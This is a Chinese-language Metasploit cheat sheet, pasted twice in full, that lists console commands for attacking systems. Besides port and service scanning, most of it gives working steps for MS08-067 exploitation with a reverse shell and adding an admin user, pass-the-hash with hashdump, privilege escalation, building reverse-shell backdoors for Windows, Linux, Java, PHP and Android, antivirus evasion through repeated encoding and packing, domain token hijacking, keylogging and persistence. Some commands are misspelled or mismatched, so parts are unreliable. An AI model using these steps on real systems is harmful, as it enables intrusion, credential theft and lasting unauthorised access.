-----------------第一季--------------------
启动Metasploit:msfconsole
升级和更新:./msfupdate
直接退出:exit 退回上一级:quit
1.端口扫描:
a.调用Nmap扫描
nmap -v -sV ip
b.调用msf模块扫描(1)
use auxiliary/scanner/portscan/syn
show options
set INTERFACE 网卡
set PORTS 端口
set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)
set THREADS 100
run
2.SMB扫描_获取系统信息
msfconsole
use auxiliary/scanner/smb/smb_version
show options
set RHOST IP
(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)
set THREADS 10
run
3.服务识别(ssh)
msfconsole
use auxiliary/scanner/ssh/ssh_version
show options
set RHOST IP
run
服务识别(FTP)
use auxiliary/scanner/ftp/ftp_version
show options
set FTPUSER
set RHOST IP
run
4.密码嗅探
msfconsole
use auxiliary/sniffer/psnuffle
show options
run
5.SNMP扫描与枚举
msfconsole
search snmp
use auxiliary/scanner/snmp/snmp_login
show options
set RHOST IP
set THREADS 10
run
use auxiliary/scanner/snmp/snmp_enum
set RHOST IP
set THREADS 10
run
6.SMB登陆验证
msfconsole
use auxiliary/scanner/smb/smb_login
show options
set RHOST IP
set SMBUser administrator
set THREADS 100
run
7.VNC身份验证
msfconsole
use auxiliary/scanner/vnc/vnc_none_auth
show options
set RHOST IP
set THREADS 100
run
8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)
msfconsole
load wmap
wmap_sites
wmap_sites -a url
wmap_sites -l
wmap_targets -h
wmap_targets -t url
wmap_targets -l
wmap_run -h
wmap_run -t
---------------第二季--------------
1.远程代码执行
msfconsole
search 08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST IP
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
info(查看影响版本)
用nmap查看目标服务器版本
set target 编号
show options(检查是否已经设置好)
exploit
shell
net user admin admin /add
2.MJDJ文件解析远程代码执行
msfconsole
search12-004
use exploit/windows/browser/ms12_004_midi
show options
set SRVHOST IP
exploit
set URIPATH /
show options
set LPORT 1244
show options
exploit
sessions
sessions -i id
3.口令安全
msfconsole
serach msql_login(ssh_login,ftp_login)
use auxiliary/scanner/mysql/mysql_login
set RHOST IP
set USERNAME root
set PASS_FILE 字典路径
set THREAD 50
set options(check)
exploit
4.hash值传递渗透
(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)
msfconsole
use/windows/smb/psexec
show options
set RHOST IP
set SMMBUSER 帐号
show options
exploit
hashdump(获取hash值)
exit
set smbpass hash
exploit
5.NDP内核提权
前提:必须有一个session
serarch 14-002
use exploit/windows/local/ms_ndproxy
show options
set session 1(id)
show options
exploit
提权:getsystem
6.多种后门的生成
a.windows后门的生成
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe
search handler
use exploit/mulit/handler
show options
set payload windows/meterpreter/reverse_tcp
show options
set LHOST IP
set LPORT 端口
点击123.exe
b.linux后门的生成
msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux
chmod 777 linux
ls
./linux
c.java后门的生成
msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar
d.php后门的生成
msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php
上传到目标站-本地监听-目标访问服务器
e.安桌后门的生成
msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk
目标运行1.apk
本地监听
7.内网渗透
获得shell扫描c段
run get_local_subnets 获取网卡
run autoroute -s ip 扫描c段
劫持域管理
use incognito
impersonate_token 域
shell
-----------------------
use auxiliary/sniffer/psnuffle
run
8.反反病毒(免杀)
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe
------------------------------------------------------------------------------
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
-------------------------------------------------------------------------------
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10
-----------------------------------------------------------------
upx -5 /1231.exe 加壳
9.不一样的xss(键盘记录)
msfconsole
search keylogger
use auxiliary/server/capture/http_javascript_keyloger
show options
set DEMO true
set URIPATH /
set srvport 80
run
10.维持访问
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST IP
SET LPORT 1111
run
run metsvs -A
-------------------------------------------
use exploit/multi/handler
set payload windows/meterpreter/metsvs_bind_tcp
show options
set LPORT 31337
set RHOST IP
exploit
keyscan_start(键盘记录)
keyscan_dump
启动Metasploit:msfconsole
升级和更新:./msfupdate
直接退出:exit 退回上一级:quit
1.端口扫描:
a.调用Nmap扫描
nmap -v -sV ip
b.调用msf模块扫描(1)
use auxiliary/scanner/portscan/syn
show options
set INTERFACE 网卡
set PORTS 端口
set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)
set THREADS 100
run
2.SMB扫描_获取系统信息
msfconsole
use auxiliary/scanner/smb/smb_version
show options
set RHOST IP
(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)
set THREADS 10
run
3.服务识别(ssh)
msfconsole
use auxiliary/scanner/ssh/ssh_version
show options
set RHOST IP
run
服务识别(FTP)
use auxiliary/scanner/ftp/ftp_version
show options
set FTPUSER
set RHOST IP
run
4.密码嗅探
msfconsole
use auxiliary/sniffer/psnuffle
show options
run
5.SNMP扫描与枚举
msfconsole
search snmp
use auxiliary/scanner/snmp/snmp_login
show options
set RHOST IP
set THREADS 10
run
use auxiliary/scanner/snmp/snmp_enum
set RHOST IP
set THREADS 10
run
6.SMB登陆验证
msfconsole
use auxiliary/scanner/smb/smb_login
show options
set RHOST IP
set SMBUser administrator
set THREADS 100
run
7.VNC身份验证
msfconsole
use auxiliary/scanner/vnc/vnc_none_auth
show options
set RHOST IP
set THREADS 100
run
8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)
msfconsole
load wmap
wmap_sites
wmap_sites -a url
wmap_sites -l
wmap_targets -h
wmap_targets -t url
wmap_targets -l
wmap_run -h
wmap_run -t
---------------第二季--------------
1.远程代码执行
msfconsole
search 08-067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST IP
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set LHOST ip
info(查看影响版本)
用nmap查看目标服务器版本
set target 编号
show options(检查是否已经设置好)
exploit
shell
net user admin admin /add
2.MJDJ文件解析远程代码执行
msfconsole
search12-004
use exploit/windows/browser/ms12_004_midi
show options
set SRVHOST IP
exploit
set URIPATH /
show options
set LPORT 1244
show options
exploit
sessions
sessions -i id
3.口令安全
msfconsole
serach msql_login(ssh_login,ftp_login)
use auxiliary/scanner/mysql/mysql_login
set RHOST IP
set USERNAME root
set PASS_FILE 字典路径
set THREAD 50
set options(check)
exploit
4.hash值传递渗透
(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)
msfconsole
use/windows/smb/psexec
show options
set RHOST IP
set SMMBUSER 帐号
show options
exploit
hashdump(获取hash值)
exit
set smbpass hash
exploit
5.NDP内核提权
前提:必须有一个session
serarch 14-002
use exploit/windows/local/ms_ndproxy
show options
set session 1(id)
show options
exploit
提权:getsystem
6.多种后门的生成
a.windows后门的生成
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe
search handler
use exploit/mulit/handler
show options
set payload windows/meterpreter/reverse_tcp
show options
set LHOST IP
set LPORT 端口
点击123.exe
b.linux后门的生成
msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux
chmod 777 linux
ls
./linux
c.java后门的生成
msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar
d.php后门的生成
msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php
上传到目标站-本地监听-目标访问服务器
e.安桌后门的生成
msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk
目标运行1.apk
本地监听
7.内网渗透
获得shell扫描c段
run get_local_subnets 获取网卡
run autoroute -s ip 扫描c段
劫持域管理
use incognito
impersonate_token 域
shell
-----------------------
use auxiliary/sniffer/psnuffle
run
8.反反病毒(免杀)
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe
------------------------------------------------------------------------------
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
-------------------------------------------------------------------------------
msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10
-----------------------------------------------------------------
upx -5 /1231.exe 加壳
9.不一样的xss(键盘记录)
msfconsole
search keylogger
use auxiliary/server/capture/http_javascript_keyloger
show options
set DEMO true
set URIPATH /
set srvport 80
run
10.维持访问
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST IP
SET LPORT 1111
run
run metsvs -A
-------------------------------------------
use exploit/multi/handler
set payload windows/meterpreter/metsvs_bind_tcp
show options
set LPORT 31337
set RHOST IP
exploit
keyscan_start(键盘记录)
keyscan_dump